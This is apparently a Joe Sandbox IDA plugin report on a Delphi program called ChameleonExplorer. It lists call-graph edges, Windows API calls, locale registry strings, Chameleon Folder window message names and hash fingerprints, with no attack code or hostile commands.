7526->7527 7527->7519 7529 332b992 7528->7529 7530 332b97f 7528->7530 7532 332b890 7529->7532 7530->7529 7531 332b890 21 API calls 7530->7531 7531->7530 7533 332b8ca 7532->7533 7534 332b89e 7532->7534 7533->7476 7534->7533 7671 3326a60 7534->7671 7537 3340e54 7536->7537 7538 3340e8f 7537->7538 7539 3340e7f 7537->7539 7547 332ce60 7538->7547 7543 3340d10 7539->7543 7542 3340e8a 7542->7506 7544 3340d29 7543->7544 7545 332ce60 27 API calls 7544->7545 7546 3340dad 7545->7546 7546->7542 7548 332ce83 7547->7548 7549 332ce76 7547->7549 7551 332cee5 7548->7551 7552 332ce92 7548->7552 7550 332b890 21 API calls 7549->7550 7557 332ce7e 7550->7557 7572 332b750 7551->7572 7554 332ceaa 7552->7554 7560 3328240 7552->7560 7563 3326a90 7554->7563 7557->7542 7558 332ceec 7558->7557 7559 332b890 21 API calls 7558->7559 7559->7557 7578 3326d00 7560->7578 7564 3326a9f 7563->7564 7567 3326ada 7563->7567 7565 3326abe 7564->7565 7568 3326aa4 7564->7568 7566 3326abc 7565->7566 7569 3326d60 21 API calls 7565->7569 7566->7557 7567->7566 7570 3326d60 21 API calls 7567->7570 7568->7566 7601 3326d60 7568->7601 7569->7566 7570->7566 7573 332b77d 7572->7573 7574 332b75e 7572->7574 7573->7558 7575 332b76b 7574->7575 7576 3328240 21 API calls 7574->7576 7604 3326a30 7575->7604 7576->7575 7579 3326d18 7578->7579 7580 3326d2c 7579->7580 7584 33317b0 7579->7584 7589 3326ce0 7580->7589 7585 33317bd 7584->7585 7588 33317e2 7584->7588 7585->7588 7592 3331690 7585->7592 7587 33317d2 TlsGetValue 7587->7588 7588->7580 7598 332b570 7589->7598 7593 333169a 7592->7593 7594 33316cb 7593->7594 7595 332b590 21 API calls 7593->7595 7596 33316b4 7593->7596 7594->7587 7595->7596 7596->7594 7597 332b590 21 API calls 7596->7597 7597->7594 7599 332b3c0 21 API calls 7598->7599 7600 3326cf0 7599->7600 7600->7554 7602 3326d00 21 API calls 7601->7602 7603 3326d7c 7602->7603 7603->7566 7605 3326a3a 7604->7605 7606 3326a3f 7604->7606 7605->7573 7610 3324dd0 7606->7610 7607 3326a45 7607->7605 7608 3326d60 21 API calls 7607->7608 7608->7605 7611 3325039 7610->7611 7619 3324e04 7610->7619 7612 3325046 7611->7612 7614 332517e 7611->7614 7613 332505a 7612->7613 7618 332505f 7612->7618 7617 3324850 2 API calls 7613->7617 7627 3324e2a 7614->7627 7637 3324b10 7614->7637 7616 3324e13 7620 3324ef0 7616->7620 7621 3324ef5 7616->7621 7616->7627 7617->7618 7625 3324a10 VirtualAlloc 7618->7625 7618->7627 7619->7616 7622 3324ec7 Sleep 7619->7622 7632 3324850 7620->7632 7621->7627 7628 3324a10 7621->7628 7622->7616 7624 3324ee0 Sleep 7622->7624 7624->7619 7625->7627 7627->7607 7629 3324970 7628->7629 7630 3324a1c VirtualAlloc 7629->7630 7631 3324a40 7630->7631 7631->7627 7633 33248a5 7632->7633 7635 332485d 7632->7635 7633->7621 7634 3324868 Sleep 7634->7635 7635->7633 7635->7634 7636 3324885 Sleep 7635->7636 7636->7635 7638 3324b41 7637->7638 7639 3324b5a 7638->7639 7640 3324ab0 Sleep 7638->7640 7639->7627 7640->7639 7642 332bedb 7641->7642 7646 332beed 7641->7646 7644 332b750 27 API calls 7642->7644 7642->7646 7643 332b890 21 API calls 7645 332bf28 7643->7645 7644->7646 7645->7519 7646->7643 7648 332cf74 7647->7648 7649 332cf5c 7647->7649 7648->7519 7650 332cf67 7649->7650 7651 332cf79 7649->7651 7652 332bec0 27 API calls 7650->7652 7653 332cf9d 7651->7653 7654 3328240 21 API calls 7651->7654 7652->7648 7662 332c160 7653->7662 7654->7653 7657 332ce60 27 API calls 7658 332cfbf 7657->7658 7659 332cfd9 7658->7659 7660 332c160 27 API calls 7658->7660 7661 332c160 27 API calls 7659->7661 7660->7659 7661->7648 7665 332c0a0 7662->7665 7666 332c0b2 7665->7666 7670 332c0f2 7665->7670 7667 332b750 27 API calls 7666->7667 7666->7670 7668 332c0ca 7667->7668 7669 332b890 21 API calls 7668->7669 7669->7670 7670->7657 7672 3326a6a 7671->7672 7673 3326a6f 7671->7673 7672->7533 7673->7672 7674 3326d60 21 API calls 7673->7674 7674->7672 7676 332aba0 7675->7676 7677 332ab46 7675->7677 7676->7447 7677->7676 7685 3331460 7677->7685 7680 332b37e 7679->7680 7683 332b2f2 7679->7683 7680->7446 7681 332b313 GetStdHandle WriteFile GetStdHandle 7774 332c640 7681->7774 7683->7681 7684 332b35c WriteFile 7684->7680 7686 3331474 7685->7686 7687 33314b8 7685->7687 7697 3327db0 7686->7697 7687->7677 7690 3327db0 21 API calls 7691 333148c 7690->7691 7692 3327db0 21 API calls 7691->7692 7694 3331498 7692->7694 7693 33314b3 7704 3326990 7693->7704 7694->7693 7695 3326a60 21 API calls 7694->7695 7695->7693 7698 3327dc4 7697->7698 7699 3327dfe 7697->7699 7698->7699 7702 3327dcc 7698->7702 7700 3327dfc 7699->7700 7701 3326dd0 21 API calls 7699->7701 7700->7690 7701->7700 7702->7700 7712 3326dd0 7702->7712 7705 332699e 7704->7705 7706 33269c3 7705->7706 7721 3325fd0 7705->7721 7708 33269ee 7706->7708 7709 33269cd VirtualFree 7706->7709 7715 33267f0 7708->7715 7709->7708 7713 33317b0 21 API calls 7712->7713 7714 3326ddc 7713->7714 7714->7700 7716 3326817 7715->7716 7717 33267fe VirtualFree 7716->7717 7718 3326823 7716->7718 7717->7716 7719 332693a VirtualFree 7718->7719 7720 332695f 7718->7720 7719->7718 7720->7687 7726 3325fde 7721->7726 7722 33264c5 7722->7706 7723 33260da 7724 3325d10 3 API calls 7723->7724 7728 3326135 7723->7728 7724->7723 7726->7723 7730 3325db0 7726->7730 7735 3325d10 7726->7735 7728->7722 7739 33257a0 7728->7739 7734 3325e0b 7730->7734 7731 3325fb9 7731->7726 7732 3325d10 3 API calls 7732->7734 7734->7731 7734->7732 7748 3325bd0 7734->7748 7736 3325d26 7735->7736 7738 3325d2b 7735->7738 7765 3325c10 7736->7765 7738->7726 7740 332585b 7739->7740 7741 33257be GetStdHandle 7739->7741 7740->7722 7772 332c060 7741->7772 7744 332c060 7745 3325809 WriteFile GetStdHandle 7744->7745 7746 332c060 7745->7746 7747 332583e WriteFile 7746->7747 7747->7740 7751 3325b40 7748->7751 7752 3325b5e 7751->7752 7756 3325bb5 7751->7756 7761 3325a40 7752->7761 7755 3325a40 VirtualQuery 7757 3325b7d 7755->7757 7756->7734 7757->7756 7758 3325a40 VirtualQuery 7757->7758 7759 3325b9e 7758->7759 7759->7756 7760 3325b40 VirtualQuery 7759->7760 7760->7756 7762 3325a59 7761->7762 7764 3325ad6 7761->7764 7763 3325aa5 VirtualQuery 7762->7763 7762->7764 7763->7764 7764->7755 7764->7756 7766 3325c65 7765->7766 7767 3325c1d 7765->7767 7768 3325c93 7766->7768 7769 3325c70 VirtualAlloc 7766->7769 7767->7766 7770 3325c28 Sleep 7767->7770 7771 3325c45 Sleep 7767->7771 7768->7738 7769->7768 7770->7767 7771->7767 7773 33257d4 WriteFile GetStdHandle 7772->7773 7773->7744 7775 332c649 7774->7775 7775->7684 8166 3331780 8167 3331791 8166->8167 8168 3331796 8166->8168 8170 3331730 8167->8170 8171 3331741 8170->8171 8172 3331770 8170->8172 8171->8172 8173 333174a TlsGetValue 8171->8173 8172->8168 8173->8172 8174 333175a 8173->8174 8175 3331762 TlsSetValue 8174->8175 8175->8172

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                            • API String ID: 2701450724-3496071916
                                                                                                            • Opcode ID: bd44fe087a9f118a2c58fb0c2ce0e3a9be6f85b68687148e117124603ab9136e
                                                                                                            • Instruction ID: 22abb7e3e4f3f94d6ca484ef261ba0ae56d5b3a7c98785219b001541203de356
                                                                                                            • Opcode Fuzzy Hash: bd44fe087a9f118a2c58fb0c2ce0e3a9be6f85b68687148e117124603ab9136e
                                                                                                            • Instruction Fuzzy Hash: 9F61E776600BD589DB30DF61ECD43DA27A8FB89788F9011259A8D4BB29EF78C345C744

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetUserDefaultUILanguage.KERNEL32 ref: 0333048E
                                                                                                            • GetLocaleInfoW.KERNEL32 ref: 033304A7
                                                                                                              • Part of subcall function 03330280: FindFirstFileW.KERNEL32 ref: 033302B2
                                                                                                              • Part of subcall function 03330280: FindClose.KERNEL32 ref: 033302CD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3216391948-0
                                                                                                            • Opcode ID: 97cdfd62aadaddb4f0cf79133ca0249d7517bd1d6b9947b83c42f3bcc0431660
                                                                                                            • Instruction ID: 8f800c8f5e99c7d7027137bf8dc9218ecfbd063c58ef17a53b36fa07cba9c0e3
                                                                                                            • Opcode Fuzzy Hash: 97cdfd62aadaddb4f0cf79133ca0249d7517bd1d6b9947b83c42f3bcc0431660
                                                                                                            • Instruction Fuzzy Hash: 3721B77A610B548ADB50EF35D8D03D92BA4FB49BDCF516102EA4E4BB58CF34C0458780

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: b2dc494c3c2f04cc2326f6bbeefa0f09e74b2d04e3ffc9d0934e39f13174eb97
                                                                                                            • Instruction ID: de4e3ac9624cd0646185d66181510f5636813acbe99309dbc5483b162a14427e
                                                                                                            • Opcode Fuzzy Hash: b2dc494c3c2f04cc2326f6bbeefa0f09e74b2d04e3ffc9d0934e39f13174eb97
                                                                                                            • Instruction Fuzzy Hash: 99F05E2A602AE089CB71EE31D8D42EC2B109B5676CF081311D67D0FBE8DE10C6568740

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RegisterWindowMessageW.USER32 ref: 03404A9F
                                                                                                            • RegisterWindowMessageW.USER32 ref: 03404AC2
                                                                                                            • RegisterWindowMessageW.USER32 ref: 03404AE5
                                                                                                            • RegisterWindowMessageW.USER32 ref: 03404B08
                                                                                                            • RegisterWindowMessageW.USER32 ref: 03404B2B
                                                                                                            • RegisterWindowMessageW.USER32 ref: 03404B4E
                                                                                                            Strings
                                                                                                            • Folder64.dll, xrefs: 03404B6A
                                                                                                            • WM_PATH_DIALOG_GET by Chameleon Folder, xrefs: 03404A98
                                                                                                            • WM_HOOK_WINDOW by Chameleon Folder, xrefs: 03404B47
                                                                                                            • ChameleonFolderHelper, xrefs: 03404959
                                                                                                            • WM_HOOK_LOG by Chameleon Folder, xrefs: 03404B24
                                                                                                            • WM_PATH_BROWSE_SET by Chameleon Folder, xrefs: 03404ADE
                                                                                                            • WM_SET_FOREGROUND by Chameleon Folder, xrefs: 03404A75
                                                                                                            • WM_PATH_DIALOG_SET by Chameleon Folder, xrefs: 03404ABB
                                                                                                            • WM_DIALOG_YPS by Chameleon Folder, xrefs: 03404B01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageRegisterWindow
                                                                                                            • String ID: ChameleonFolderHelper$Folder64.dll$WM_DIALOG_YPS by Chameleon Folder$WM_HOOK_LOG by Chameleon Folder$WM_HOOK_WINDOW by Chameleon Folder$WM_PATH_BROWSE_SET by Chameleon Folder$WM_PATH_DIALOG_GET by Chameleon Folder$WM_PATH_DIALOG_SET by Chameleon Folder$WM_SET_FOREGROUND by Chameleon Folder
                                                                                                            • API String ID: 1814269913-3724733743
                                                                                                            • Opcode ID: 2e1987c7ff812932dd0c036f9d0e5a9e185d2c6c43f3db19ff6a540cb528cede
                                                                                                            • Instruction ID: 3a86fcf92ba68151747fdac977a944f7a6c86e0731fdba2b34f6b392bb20cd73
                                                                                                            • Opcode Fuzzy Hash: 2e1987c7ff812932dd0c036f9d0e5a9e185d2c6c43f3db19ff6a540cb528cede
                                                                                                            • Instruction Fuzzy Hash: 9C515E79A14B808EE361EF20ECA239A33A8F745318F508519C64C4F7A4DFBD9749CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 76 332b3c0-332b3cf 77 332b3d1-332b3db call 332b0f0 call 332b2e0 76->77 78 332b3e6-332b3ee 76->78 77->78 80 332b3f0-332b3fb GetCurrentThreadId 78->80 81 332b414-332b41b 78->81 80->81 85 332b3fd-332b40f call 332b270 80->85 82 332b446-332b44d 81->82 83 332b41d-332b425 81->83 88 332b462-332b469 82->88 89 332b44f-332b456 82->89 86 332b427-332b443 83->86 87 332b445 83->87 85->81 86->87 87->82 93 332b46b-332b473 call 3326c90 88->93 94 332b488-332b494 call 332ab30 88->94 89->88 92 332b458 89->92 92->88 103 332b487 93->103 104 332b475-332b485 call 33284d0 call 3326c90 93->104 101 332b496-332b49d 94->101 102 332b49f-332b4a7 94->102 101->102 105 332b4eb-332b4fd 101->105 102->105 106 332b4a9-332b4cb call 3330a50 102->106 103->94 104->103 109 332b505-332b50c 105->109 110 332b4ff call 342dc28 105->110 106->105 121 332b4cd-332b4d9 106->121 112 332b51a-332b522 109->112 113 332b50e-332b515 call 332b270 109->113 110->109 119 332b524-332b52c 112->119 120 332b53f-332b556 112->120 113->112 122 332b534-332b53a ExitProcess 119->122 123 332b52e call 3429068 119->123 120->82 121->105 124 332b4db-332b4e6 FreeLibrary 121->124 123->122 124->105
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332B3F0
                                                                                                            • FreeLibrary.KERNEL32 ref: 0332B4E6
                                                                                                            • ExitProcess.KERNEL32 ref: 0332B53A
                                                                                                              • Part of subcall function 0332B2E0: GetStdHandle.KERNEL32(?,?,?,?,?,?,?,0332B3DB), ref: 0332B319
                                                                                                              • Part of subcall function 0332B2E0: WriteFile.KERNEL32 ref: 0332B33D
                                                                                                              • Part of subcall function 0332B2E0: GetStdHandle.KERNEL32 ref: 0332B348
                                                                                                              • Part of subcall function 0332B2E0: WriteFile.KERNEL32 ref: 0332B377
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3490077880-0
                                                                                                            • Opcode ID: ca2f0a321db8abb945a96c98235d78302e6c0eac1ac380f9ffa05a8bf87ec55d
                                                                                                            • Instruction ID: 0516f0294b2f76b7671aac5f31b65b40db3a01ce35169f7dd9cd62bd30102316
                                                                                                            • Opcode Fuzzy Hash: ca2f0a321db8abb945a96c98235d78302e6c0eac1ac380f9ffa05a8bf87ec55d
                                                                                                            • Instruction Fuzzy Hash: 9B410E35D14BA884FB22DF12ECC8726AFB8B706754F980155D9595E2B0CFBCA2C4D351

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 126 34082b0-34082c4 127 34082ca-34082cc 126->127 128 340839b-34083a6 126->128 129 34082d2-3408311 call 33332f0 127->129 130 34083d8-34083dd 127->130 131 34083b7-34083c2 128->131 132 34083a8-34083b2 call 3333680 128->132 139 3408313-3408321 129->139 140 3408326-3408369 call 33333e0 call 3333610 129->140 135 34083d3 call 3404fa0 131->135 136 34083c4-34083ce CloseHandle 131->136 132->131 135->130 136->135 139->130 145 3408394 call 3404f70 140->145 146 340836b-340838d call 3327e20 140->146 149 3408399 145->149 146->145 149->130
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,03413B62), ref: 034083CE
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER64}, xrefs: 034082EB
                                                                                                            • H, xrefs: 0340834D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID: H${A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER64}
